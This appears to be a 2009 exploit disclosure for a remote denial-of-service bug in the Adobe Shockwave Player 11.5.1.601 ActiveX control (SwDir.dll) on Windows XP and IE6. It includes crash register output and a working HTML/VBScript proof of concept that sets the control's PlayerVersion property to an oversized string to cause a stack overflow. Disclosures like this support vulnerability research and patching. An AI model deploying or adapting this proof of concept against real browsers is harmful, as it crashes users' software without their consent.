######################## Application: Adobe ShockWave Player (11.5.1.601) Platforms: Windows XP Professional French SP2 and SP3 crash: IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-08-24 Author: Francis Provencher (Protek Research Lab's) ######################## 1) Introduction 2) Technical details and bug 3) The Code ##################################################################################### =============== 1) Introduction =============== Over 450 million Internet-enabled desktops have installed Adobe Shockwave Player. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. Shockwave Player displays Web content that has been created by Adobe Director. ######################## ============================ 2) Technical details ============================ Name: SwDir.dll Ver.: 11.5.1.601 CLSID: {233C1507-6A77-46A4-9443-F871F945D258} (d40.b20): Stack overflow - code c00000fd eax=00305004 ebx=00000003 ecx=00032f80 edx=00400000 esi=09ae0024 edi=00400002 eip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202 ######################## =========== 3) The Code =========== Proof of concept DoS code; <html> <object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object> <script language='vbscript'> argCount = 1 arg1=String(2097152, "A") ShockW.PlayerVersion = arg1 </script> ########################